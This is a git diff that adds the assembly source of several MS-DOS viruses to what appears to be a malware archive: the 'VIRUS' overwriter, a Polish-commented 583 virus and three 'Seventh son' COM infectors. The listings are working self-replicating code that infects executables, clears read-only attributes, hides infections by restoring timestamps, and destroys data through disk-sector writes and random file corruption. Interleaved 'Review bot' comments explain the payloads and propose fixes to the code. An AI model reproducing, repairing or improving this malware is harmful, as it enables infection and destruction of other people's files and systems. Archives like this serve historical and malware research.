system's time. +;; The infected files are lost en must be replaced by backup-copies. +;; +;; The shortest size an infected file can be is 230h bytes. The code is +;; shorter, but this is the value which has been put into the code as +;; the virus-length. +;; +;; + + +Code Segment + Assume CS:Code +progr equ 100h + org progr + +; +; The three NOP's are set as a identifier for the virus. This way +; the virus knows this copy is already infected. +; + +MAIN: + nop + nop + nop + +; +; Init the Pointers +; + + mov ax,0 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +; +; Get actual diskdrive +; + + mov ah,19h ; drive? + int 21h + +; +; Get actual path +; + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive? 
+ lea si,cs:old_path + int 21h + +; +; Get actual number of present diskdrives.If only one diskdrive is present, +; the pointer for 'search_order' will transfered to 'search_order + 6' +; + + mov ah,0Eh ; how many disks + mov dl,0 + int 21h + mov al,1 + cmp al,1 ; one drive? + jne hups3 + mov al,6 +hups3: + mov ah,0 + lea bx,cs:search_order + add bx,ax + add bx,1 + mov cs:pointer,bx + clc + +; +; The carry-flag is set if the search will find no more .COM-files. To do +; it the easy way, all .EXE-files will get the .COM-extention to become +; infected. This will result in an error if the executed .EXE is to big. +; The error-message 'Program too big to fit in memory' will be the result. +; + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:mask_exe + int 21h + cmp al,0FFh + jnz no_name_change ; .EXE found? + +; +; When no .COM or .EXE-files are found, sectors will be overwritten, +; depending from the system's time in the msec-range. This is the moment +; that the entire disk is infected. 'VIRUS' can not infect any more and +; starts the destruction. +; + + mov ah,2Ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; Write shit on disk + +; +; Test if the end of the seek-procedure or of the table has been reached. +; If so: end. +; + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0FFh + jnz hups2 + jmp hops + +; +; Get new disk from the list with search orders and make it the actual one. +; + +hups2: + mov ah,0Eh + int 21h ; change disk + +; +; Start at the ROOT-Directory. +; + + mov ah,3Bh ; change path + lea dx,cs:path + int 21h + jmp find_first_file + +; +; Starting from the ROOT-dir, search for the first sub-dir. Previous change +; all .EXE-files into .COM-files in the old directory. 
+; + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:mask_exe + int 21h + mov ah,3Bh ; use root dir + lea dx,cs:path + int 21h + mov ah,4Eh ; search for first subdir + mov cx,11h ; dir mask + lea dx,cs:mask_dir + int 21h + jc change_disk + mov bx,cs:counter + inc bx + dec bx + jz use_next_subdir + +; +; Search for the next sub-dirs. Change to other drive if no sub-dir is +; found. +; + +find_next_subdir: + mov ah,4Fh ; search for next sub-dir. + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +; +; Change found sub-dir in actual one. +; + +use_next_subdir: + mov ah,2Fh ; get dta address + int 21h + add bx,1Ch + mov word ptr es:[bx],'\' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3Bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov cs:counter,bx + +; +; Search first .COM-file in the actual directory. If no .COM-files present, +; search the next directory. +; + +find_first_file: + mov ah,4Eh ; search for first + mov cx,1 ; mask + lea dx,cs:mask_com + int 21h + jc find_first_subdir + jmp short check_if_ill + +; +; If the file is already infected, search next file. +; + +find_next_file: + mov ah,4Fh ; search for next + int 21h + jc find_first_subdir + +; +; Test on infection. +; + +check_if_ill: + mov ah,3Dh ; open channel + mov al,2 ; read/write + mov dx,9Eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3Fh ; read file + mov cx,buflen + mov dx,buffer ; write in buffer + int 21h + mov ah,3Eh ; close file + int 21h + +; +; Test if the three NOPs of 'VIRUS' are present. If so, the file is already +; infected, continue searching. +; + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +; +; Erase the write-protection attribute from MS-DOS. +; + + mov ah,43h ; write enable + mov al,0 + mov dx,9Eh ; address of name in dta + int 21h + mov ah,43h + mov al,1 + and cx,0FEh + int 21h + +; +; Open file for writing/reading. 
+; + + mov ah,3Dh ; open channel + mov al,2 ; read/write + mov dx,9Eh ; address of name in dta + int 21h + +; +; Store date of file for later use. +; + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save data + push dx + +; +; Save the original jump from program. +; + + mov dx,cs:[conta] ; save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ; save new jump + lea cx,cs:cont-100h + sub dx,cx + mov cs:[conta],dx + +; +; 'VIRUS' copies itself to the beginning of a file. +; + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +; +; Restore the old file-date. +; + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +; +; Close file. +; + + mov ah,3Eh ; close file + int 21h + +; +; Restore the old jump-address. 'VIRUS' stores at address 'conta' the jump +; which was at the beginning of the host-program. This will keep the host- +; program as much executable as possible. After storing the address, it +; works with the jumpaddress of 'VIRUS'. 'VIRUS' will thus be in the +; work-memory of the program. +; + + mov dx,cs:[jmpbuf] ; restore old jmp + mov cs:[conta],dx +hops: + nop + call use_old + +; +; Continue the execution of the host-program. +; + + +cont db 0e9h +conta dw 0 + mov ah,00 + int 21h + +; +; Activate the diskdrive choosen at the entry of the program. +; + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +; +; Activate the path choosen at the entry of the program. 
+; + + mov ah,3Bh ; use old dir + lea dx,cs:[1FDh] ; get old path and + ; backslash + int 21h + ret + + +search_order db 0FFh,1,0,2,3,0FFh,0,0FFh +pointer dw 0000 +counter dw 0000 +disks db 0 +mask_com db "*.com",00 ; search for com-files +mask_dir db "*",00 ; search for dirs +mask_exe db 0FFh, 0, 0, 0, 0, 0, 3Fh + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +mask_all db 0FFh, 0, 0, 0, 0, 0, 3Fh + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +;; mask_all is never used by the code and easilly can be ommited +;; to shorten the code + +buffer equ 0e000h ; a save place +buflen equ 230h ; length of virus + +;; At this place I disagree with Ralf. The actual length of the virus +;; is 21Dh bytes when compiled in MASM and 219h bytes when compiled +;; in A86. Because it was Ralf's intention to compile this in MASM +;; 21Dh should be the original length. + +jmpbuf equ buffer+buflen ; a save place for jmp +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" + +;; This variable is never used in the code and easilly can be ommited +;; to shorten the code. + +old_path db 32 dup (?) ; old path + +code ends + + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.583virus.asm b/MSDOS/Virus.MSDOS.Unknown.583virus.asm new file mode 100644 index 00000000..f8eb6a05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.583virus.asm 
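Review bot: The `;; This variable is never used in the code` note on `back_slash` is wrong and its advice would break the path restore: `use_old` reaches that byte through `lea dx,cs:[1FDh]`, a hard-coded offset which the inline comment and the 541 sibling in this commit (`lea dx,old_path-1 ; get old path and backslash`) identify as `old_path-1`, so `back_slash` is exactly the leading `\` that INT 21h/3Bh receives in front of the saved path. Removing `back_slash` or `mask_all` as the two notes suggest would silently shift 1FDh onto other data with no assembler error. I would restore the symbolic form, `lea dx,cs:old_path-1 ; back_slash + old_path`, and drop both "can be omitted" notes. Separately, `mov word ptr es:[bx],'\'` differs from the 541 listing's `'\ '`: a one-character word literal is zero-extended, putting 5Ch at DTA+1Ch and 00h at +1Dh, while the `chdir` below starts from +1Dh, so this reconstruction likely changes directory differently from the original and is worth checking against it.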
@@ -0,0 +1,324 @@ +; Kod rdowy wirusa nieznanego autorstwa. Widoczne s silne wpywy 648. +; Dodano wasne komentarze wskazujce na rnice midzy t wersj i oryginaem. +; Komentarze te poprzedzane s znakami AK:. +; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzenia 1990. + +comment ; +********************************************************** +wszystkie adresy w programie sa uzywane jako wzgledne +do rejestru si ,nie mozna urzywac adresow bezwzglednych +jako offset poniewaz po 'doklejeniu sie do programu +moze on byc w roznych miejscach +********************************************************** +; +adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych + ;w programie wzgledem niego beda + ;obliczane przesuniecia pol zmiennych +start_prg equ 100h ;adres poczatku programu typu .com +ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy +get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA +msdos equ 21h +write equ 40h +wirus_len equ DTA + 43 - start + +code segment byte public 'code' + assume cs:code,ds:code,es:code + + org 100h + +st1: jmp short start + + int msdos + +start: mov dx,offset stare_DTA + cld ;ustawienie kierunku przesylania + mov si,dx ;poczatek zmiennych programu + add si,ofst_rozk ;adres pola rozkazy + mov di,100h ;adres pod ktorym jest poczatek programu + mov cx,3 ;ilosc bajtow do przeslania + repz movsb ;odtworzenie starego poczatku + + mov si,dx ;odtworzenie si + +; AK: pominito badanie wersji DOS + + push es ;zachowanie es bo bedzie zmieniane + mov ah,get_dta_addr ;pobierz adres DTA + int msdos + mov [si],bx ;zapamietanie adresu DTA w polu + mov [si+2],es ;stare_DTA + pop es ;odtworzenie es + + mov dx,5Fh ;adres pola DTA + add dx,si + mov ah,1Ah ;ustaw adres DTA ds:dx + int msdos + +; AK: zmieniona jest kolejno instrukcji, teraz do przechowania SI uyto +; DX zamiast stosu + + push es ;zachowanie es + push si ;zachowaj si + add si,1ah ;adres tekstu PATH= + mov dx,si + mov es,ds:[2Ch] ;adres srodowiska set + +; AK: w 
oryginale jest to PUSH SI, POP SI + + mov di,0 + +szukaj_dalej: + mov si,dx + lodsb + mov cx,8000h ;dlugosc srodowiska + repnz scasb ;szukanie litery P + mov cx,4 ;dlugosc reszty ATH= + +porownuj: + lodsb + scasb + jnz szukaj_dalej + loop porownuj + + pop si ;odtworz rejestry + pop es + + mov [si+16h],di ;adres pierwszego bajtu za PATH= + mov di,si + add di,1Fh ;adres bufora dla nazwy zbioru + mov bx,si + jmp short dalej + +nast_sciezka: + cmp word ptr[si+16h],0 ;czy koniec path + jnz l1 ;nie + + jmp exit1 ;zakoncz nie ma wiecej zbiorow + +l1: push ds + push si + mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany + mov di,si + mov si,es:[di+16h] + add di,1Fh + +next: lodsb ;zaladuj kolejny znak sciezki dostepu + cmp al,';' ;czy koniec definicji scierzki + jz koniec_sciezki + cmp al,0 ;czy koniec lancucha path + jz koniec_set + stosb ;przepisz znak do bufora + jmp short next + +koniec_set: + mov si,0 +koniec_sciezki: + pop bx + pop ds + mov [bx+16h],si ;adres do ktorego przeszukano path + cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \ + jz dalej + mov al,'\' + stosb ;dopisz \ + +dalej: mov [bx+18h],di + mov si,bx + add si,10h + mov cx,6 + repz movsb ;przepisanie *.com \0 + mov si,bx + mov ah,4Eh ;find first + mov dx,1Fh + add dx,si + mov cx,3 ;ukryty tylko do odczytu + int msdos + jmp short czy_jest + +szuk_nast: + mov ah,4Fh ;find next + int msdos + +czy_jest: + jnc jest + + jmp short nast_sciezka + +jest: mov ax,[si+75h] ;pole zawierajace czas w DTA + and al,1Fh ;czy sa 62 sekundy + cmp al,1Fh + + jz szuk_nast + cmp word ptr [si+79h],0FA00h + ja szuk_nast ;jesli zbyt dlugi + cmp word ptr [si+79h],10 + jc szuk_nast + + mov di,[si+18h] + push si + add si,7Dh +kopiuj: + lodsb ;kopiuje nazwe zbioru + stosb ;nazwa w postaci ASCIIZ + cmp al,0 ;czy koniec nazwy + jnz kopiuj + pop si + + mov ax,4300h ;pobierz atrybuty zbioru + mov dx,1Fh + add dx,si + int msdos + mov [si+8],cx ;zapamietanie atrybutow + + mov ax,4301h ;ustaw atrybuty + and cx,0FFFEh ;usuwa 
ewentualne r/o + mov dx,1Fh + add dx,si + int msdos + + mov ax,3D02h ;otwarcie zbioru + mov dx,1Fh + add dx,si + int msdos + + jnc l2 ;czy poprawne otwarcie + + jmp exit2 + +l2: mov bx,ax + mov ax,5700h ;pobierz czas i date powstania zbioru + int msdos + mov [si+4],cx ;czas + mov [si+6],dx ;data + + mov ah,2Ch ;pobierz czas systemowy + int msdos + + and dh,7 ;sekundy + jnz zostaw + +comment ; +********************************************************** +tutaj mozna umiescic dowolna procedure uszkadzajaca zbior +ta wywolywana jest losowo jesli ostatnie trzy bity sekund +zegara systemu sa rowne zero np. 8,16,24 itd. +********************************************************** +; + mov ah,write ;zapis do zbioru + mov cx,5 ;pieciu bajtow lezacych + mov dx,si ;juz poza programem czyli + add dx,8Ah ;faktycznie dowolnych + int msdos + jmp exit3 + +;********************************************************* +;koniec procedury uszkadzajacej zbior +;********************************************************* + +zostaw: mov ah,3Fh ;odczyt trzech pierwszych + mov cx,3 ;bajtow z pliku + mov dx,ofst_rozk ;do pola rozkazy + add dx,si + int msdos + + jc exit3 ;jesli byl blad czytania + + cmp ax,3 ;czy odczytano dokladnie + jnz exit3 ;trzy bajty + + mov ax,4202h ;przewiniecie zbioru na koniec + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov cx,ax ;w ax dlugosc zbioru + sub ax,3 +;obiczanie przesuniecia dla skoku do poczatku wirusa +;jest to adres konca zbioru minus 3 poniewaz +;jmp jest trzy bajtowy + + mov [si+0Eh],ax ;zapis adresu w polu skok + + add cx,adr_baz - start + start_prg +;obliczanie adresu poczatku danych (tego ktory jest w si) +;jest to adres pola stare_DTA + 100h przesuniecia programu + + mov di,si + sub di,adr_baz - start - 1 + mov [di],cx ;zapisanie adresu bezposrednio w pole + ;w pole rozkazu mov dx,offset + + mov ah,write ;dopisanie wirusa na koniec + mov cx,wirus_len ;dlugosc wirusa + mov dx,si + sub dx,adr_baz - start ;obliczenie adresu poczatku 
wirusa + int msdos + + jc exit3 ;jesli blad + cmp ax,wirus_len ;czy zapisano calego wirusa + jnz exit3 + + mov ax,4200h ;przewiniecie zbioru na poczatek + mov cx,0 + mov dx,0 + int msdos + + jc exit3 ;jesli blad + + mov ah,write ;zapis jmp do wirusa + mov cx,3 ;na poczatku + mov dx,si + add dx,0Dh ;pole skok + int msdos + +exit1: mov dx,[si+6] ;data + mov cx,[si+4] ;czas + or cx,1Fh ;zaznaczenie ze zbior jest zarazony + ;ilosc sekund = 62 + + mov ax,5701h ;zapis daty i czasu do zbioru + int msdos + + mov ah,3Eh ;zamkniecie zbioru + int msdos + +exit2: mov ax,4301h ;ustawienie atrybutow + mov cx,[si+8] ;stare atrybuty + mov dx,001Fh + add dx,si + int msdos + +exit3: push ds + mov ah,1Ah ;ustaw adres DTA + mov dx,[si+0] ;pole stare_DTA + mov ds,es:[si+2] + int msdos + + pop ds + + xor ax,ax ;zerowanie rejestrow + xor bx,bx + xor dx,dx + xor si,si + mov di,0100h ;na stos adres startu + push di + xor di,di + ret + +stare_DTA dd 0 +czas_zb dw 0 +data_zb dw 0 +attr_zb dw 0 +rozkazy db 0b4h,4ch,0cdh +skok db 0e9h,0,0 ;kod rozkazu jmp +zbior db '*.com',0 +srodow dw 0 ;adres srodowiska set +bufor dw 0 ;wskaznik do nazwy zbioru +path db 'PATH=' +nazwa_zb db 63 dup(0) ;pole na nazwe zbioru +DTA db 43 dup(0) ;pole dta + +code ends + end st1 + diff --git a/MSDOS/Virus.MSDOS.Unknown.7son.asm b/MSDOS/Virus.MSDOS.Unknown.7son.asm new file mode 100644 index 00000000..9e1c79c2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son.asm 
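Review bot: The random corruption branch at `and dh,7 / jnz zostaw` is documented only in Polish and deserves an English note for readers of this corpus: when the low three bits of the system-clock seconds are zero, the virus writes 5 bytes from `[si+8Ah]` — memory past its own end, i.e. arbitrary data — over the start of the host instead of infecting it. I would add a header line such as `; Payload: 1-in-8 chance (seconds & 7 == 0) of overwriting the host's first 5 bytes with garbage; infected files are marked with seconds = 62 (time field | 1Fh)`. The DTA the code addresses at `si+5Fh` (time at `+75h`, size at `+79h`, name at `+7Dh`) is one byte past the `DTA` label, which is harmless for a scratch buffer but worth noting so the offsets are not "corrected" to the label by a later editor.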
@@ -0,0 +1,251 @@ +From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994 +Xref: netcom.com alt.comp.virus:506 +Path: netcom.com!ix.netcom.com!netnews +From: Zeppelin@ix.netcom.com (Mr. G) +Newsgroups: alt.comp.virus +Subject: 7th Son Virus +Date: 29 Nov 1994 13:02:59 GMT +Organization: Netcom +Lines: 236 +Distribution: world +Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com> +References: +NNTP-Posting-Host: ix-pas2-10.ix.netcom.com + +;*********************************************************************** +***** +;* Seventh son of a seventh son version 4 +;* +;* Compile with MASM 4.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;*********************************************************************** +***** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + + .RADIX 16 + +FILELEN equ end - start +MINTARGET equ 1000d +MAXTARGET equ -(FILELEN+40) + + + +;*********************************************************************** +***** +;* Dummy program (infected) +;*********************************************************************** +***** + + org 100 + +begin: db 4Dh ;virus mark + db 0E9h, 4, 0 ;jump to virus entry + + +;*********************************************************************** +***** +;* Begin of the virus +;*********************************************************************** +***** + +start: db 0CDh, 20h, 0, 0 + + cld + mov si,0100h + push si ;push new IP on stack + mov di,si + add si,[si+2] ;si -> start + + push si ;restore original begin + movsw + movsw + pop si + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + lea dx,[si+(offset ni24 - 0104)] ;set new int24 +vector + mov ah,25h + push ax + int 21 + + mov ah,2Fh 
;get DTA adres + int 21 + push es + push bx + + add dx,070h ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + push dx + + lea di,[si+(offset generation-0104)] ;check +generation + cmp [di],0707h + jne verder + + lea dx,[di+2] ;7th son of a 7th son! + mov ah,09h + int 21 + +verder: mov ax,[di] ;update generations + xchg ah,al + mov al,1 + mov [di],ax + + lea dx,[di+33d] ;find first COM-file + xor cx,cx + mov ah,4Eh +infloop: int 21 + pop dx + jc stop + + push dx + + xor cx,cx ;clear +read-only-arttribute + mov ax,4301 + int 21 + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + mov dx,si + mov ah,3fh + int 21 + + cmp byte ptr [si],4Dh ;already infected or an +EXE? + je return2 + cmp byte ptr [si],5Ah ;or a weird EXE? + je return2 + + mov al,2 ;go to end of file + call seek + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of +file + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? 
+ pop ax + jnz return2 + + xchg ax,bp + mov al,0 ;go to begin of file + call seek + + mov word ptr [si],0E94Dh ;write mark and +jump-command + mov word ptr [si+2],bp + mov ah,40h + int 21 + + inc byte ptr [di] ;number of next son + +return2: pop dx ;restore file date & +time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: mov ah,4Fh ;find next file + jmp short infloop + +stop: pop dx ;restore DTA adres + pop ds + mov ah,1Ah + int 21 + + pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + push cs + push cs + pop ds + pop es + + ret + +seek: mov ah,42 + cwd +int21: xor cx,cx + int 21 + mov cl,4 + mov dx,si + ret + + +;*********************************************************************** +***** +;* Interupt handler 24 +;*********************************************************************** +***** + +ni24: mov al,03 + iret + + +;*********************************************************************** +***** +;* Data +;*********************************************************************** +***** + +generation db 1,1 +sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.7son2.asm b/MSDOS/Virus.MSDOS.Unknown.7son2.asm new file mode 100644 index 00000000..3e5e30ba --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son2.asm 
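Review bot: Several comment continuations in this copy landed on their own lines without a `;` (`vector`, `generation`, `read-only-arttribute`, `EXE?`, `file`, `jump-command`, `time`, `adres`), so the file will not assemble as-is; it appears to be a line-wrapped Usenet repost of the same source stored as Virus.MSDOS.Unknown.7son4.asm, news headers included. A provenance comment at the top would save the next reader a diff: `; NOTE: mail-wrapped copy of 7son4.asm (alt.comp.virus, 1994-11-29); bare words on their own lines are broken comment tails, not code`. The `;****` banner lines are split the same way, with `*****` on a following line.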
@@ -0,0 +1,232 @@ +;**************************************************************************** +;* Seventh son of a seventh son version 2 +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + +FILELEN equ end - start +MINTARGET equ 1000 +MAXTARGET equ -(FILELEN+40h) + + org 100h + + .RADIX 16 + + +;**************************************************************************** +;* Dummy program (infected) +;**************************************************************************** + +begin: db 4Dh + jmp start + + +;**************************************************************************** +;* Begin of the virus +;**************************************************************************** + +start: call start2 +start2: pop bp + sub bp,0103h + + lea si,[bp+offset begbuf-4] ;restore begin of file + mov di,0100h + movsw + movsw + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + mov dx,offset ni24 - 4 ;set new int24 vector + add dx,bp + mov ax,2524h + int 21 + + lea dx,[bp+offset end] ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + mov word ptr [bp+offset nameptr-4],dx + + lea si,[bp+offset grandfather-4] ;check generation + cmp [si],0606h + jne verder + + lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! 
+ mov ah,09h + int 21 + +verder: mov ax,[si] ;update generations + xchg ah,al + xor al,al + mov [si],ax + + lea dx,[bp+offset filename-4] ;find first COM-file + xor cx,cx + mov ah,4Eh + int 21 + +infloop: mov dx,word ptr [bp+offset nameptr-4] + call infect + + mov ah,4Fh ;find next file + int 21 + jnc infloop + + pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + push cs + push cs + pop ds + pop es + mov ax,0100h ;put old start-adres on stack + push ax + + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov ax,4300h ;ask attributes + int 21 + push cx + + xor cx,cx ;clear flags + call setattr + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + lea dx,[bp+offset begbuf-4] + mov ah,3fh + int 21 + + mov al,byte ptr [bp+begbuf-4] ;already infected? + cmp al,4Dh + je return2 + cmp al,5Ah ;or a weird EXE? + je return2 + + call endptr ;get file-length + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of file + lea dx,[bp+offset start-4] + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? 
+ pop ax + jnz return2 + + sub ax,4 ;calculate new start-adres + mov word ptr [bp+newbeg-2],ax + + call beginptr ;write new begin of file + mov cx,4 + lea dx,[bp+offset newbeg-4] + mov ah,40h + int 21 + + inc byte ptr [si] ;number of next son + +return2: pop dx ;restore file date & time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: pop cx ;restore file-attribute +; call setattr + +; ret + + +;**************************************************************************** +;* Changes file-attributes +;**************************************************************************** + +setattr: mov dx,word ptr [bp+offset nameptr-4] + mov ax,4301h + int 21 + ret + + +;**************************************************************************** +;* Subroutines for file-pointer +;**************************************************************************** + +beginptr: mov ax,4200h ;go to begin of file + jmp short ptrvrdr + +endptr: mov ax,4202h ;go to end of file +ptrvrdr: xor cx,cx + xor dx,dx + int 21 + ret + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Data +;**************************************************************************** + +begbuf db 0CDh, 20h, 0, 0 +newbeg db 4Dh, 0E9h, 0, 0 +nameptr dw ? +sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' +grandfather db 0 +father db 0 +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.7son4.asm b/MSDOS/Virus.MSDOS.Unknown.7son4.asm new file mode 100644 index 00000000..d5420f3c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.7son4.asm 
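Review bot: `infect` ends at `return1: pop cx` with `call setattr` and `ret` commented out, so it relies on falling through into `setattr` to restore the saved attribute in cx and then return to `infloop`; that implicit tail call is easy to break by inserting anything between the two routines and should be stated where it happens. I would replace the two commented lines with `; falls through into setattr: restores attrs from cx, its ret returns to infloop`. The `MINTARGET equ 1000` line precedes `.RADIX 16`, so it is decimal 1000 here while `MAXTARGET` spells `40h` explicitly — consistent, but worth a comment since version 4 writes it `1000d` after the radix switch.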
@@ -0,0 +1,218 @@ +;**************************************************************************** +;* Seventh son of a seventh son version 4 +;* +;* Compile with MASM 4.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:cseg,ss:cseg + + .RADIX 16 + +FILELEN equ end - start +MINTARGET equ 1000d +MAXTARGET equ -(FILELEN+40) + + + +;**************************************************************************** +;* Dummy program (infected) +;**************************************************************************** + + org 100 + +begin: db 4Dh ;virus mark + db 0E9h, 4, 0 ;jump to virus entry + + +;**************************************************************************** +;* Begin of the virus +;**************************************************************************** + +start: db 0CDh, 20h, 0, 0 + + cld + mov si,0100h + push si ;push new IP on stack + mov di,si + add si,[si+2] ;si -> start + + push si ;restore original begin + movsw + movsw + pop si + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector + mov ah,25h + push ax + int 21 + + mov ah,2Fh ;get DTA adres + int 21 + push es + push bx + + add dx,070h ;set new DTA adres + mov ah,1Ah + int 21 + add dx,1Eh + push dx + + lea di,[si+(offset generation-0104)] ;check generation + cmp [di],0707h + jne verder + + lea dx,[di+2] ;7th son of a 7th son! 
+ mov ah,09h + int 21 + +verder: mov ax,[di] ;update generations + xchg ah,al + mov al,1 + mov [di],ax + + lea dx,[di+33d] ;find first COM-file + xor cx,cx + mov ah,4Eh +infloop: int 21 + pop dx + jc stop + + push dx + + xor cx,cx ;clear read-only-arttribute + mov ax,4301 + int 21 + jc return1 + + mov ax,3D02h ;open the file + int 21 + jc return1 + xchg bx,ax + + mov ax,5700h ;get file date & time + int 21 + push cx + push dx + + mov cx,4 ;read begin of file + mov dx,si + mov ah,3fh + int 21 + + cmp byte ptr [si],4Dh ;already infected or an EXE? + je return2 + cmp byte ptr [si],5Ah ;or a weird EXE? + je return2 + + mov al,2 ;go to end of file + call seek + + cmp ax,MAXTARGET ;check length of file + jnb return2 + cmp ax,MINTARGET + jbe return2 + + push ax + mov cx,FILELEN ;write program to end of file + mov ah,40h + int 21 + cmp ax,cx ;are all bytes written? + pop ax + jnz return2 + + xchg ax,bp + mov al,0 ;go to begin of file + call seek + + mov word ptr [si],0E94Dh ;write mark and jump-command + mov word ptr [si+2],bp + mov ah,40h + int 21 + + inc byte ptr [di] ;number of next son + +return2: pop dx ;restore file date & time + pop cx + mov ax,5701h + int 21 + + mov ah,3Eh ;close the file + int 21 + +return1: mov ah,4Fh ;find next file + jmp short infloop + +stop: pop dx ;restore DTA adres + pop ds + mov ah,1Ah + int 21 + + pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + push cs + push cs + pop ds + pop es + + ret + +seek: mov ah,42 + cwd +int21: xor cx,cx + int 21 + mov cl,4 + mov dx,si + ret + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Data +;**************************************************************************** + +generation db 1,1 +sontxt db 
'Seventh son of a seventh son',0Dh, 0Ah, '$' +filename db '*.COM',0 + db '' + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.808.asm b/MSDOS/Virus.MSDOS.Unknown.808.asm new file mode 100644 index 00000000..c08f8cea --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.808.asm 
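Review bot: The `ni24` handler returns `al,03` and nothing explains why: DOS reads that as "fail the call", so a write to a write-protected disk or a bad sector fails silently instead of raising the Abort/Retry/Ignore prompt while the loop runs. A one-line comment at the handler, `; critical-error handler: AL=3 = fail, suppresses Abort/Retry/Ignore during infection`, plus `; saved via 3524h, restored via 2524h in stop:` at the push/pop pairs, would make the stack discipline in `stop:` readable. The same goes for the ctrl-break flag: `mov ax,3300h` reads it, then `cwd / inc ax` forms AX=3301h, DL=0 to clear it, with AX pushed for the restore.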
